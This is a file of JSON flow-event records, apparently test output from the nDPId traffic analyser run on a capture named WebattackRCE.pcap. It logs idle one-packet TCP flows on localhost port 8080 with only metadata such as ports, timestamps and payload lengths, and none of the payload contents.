00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7580000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7580000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7580000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7580000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7580000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
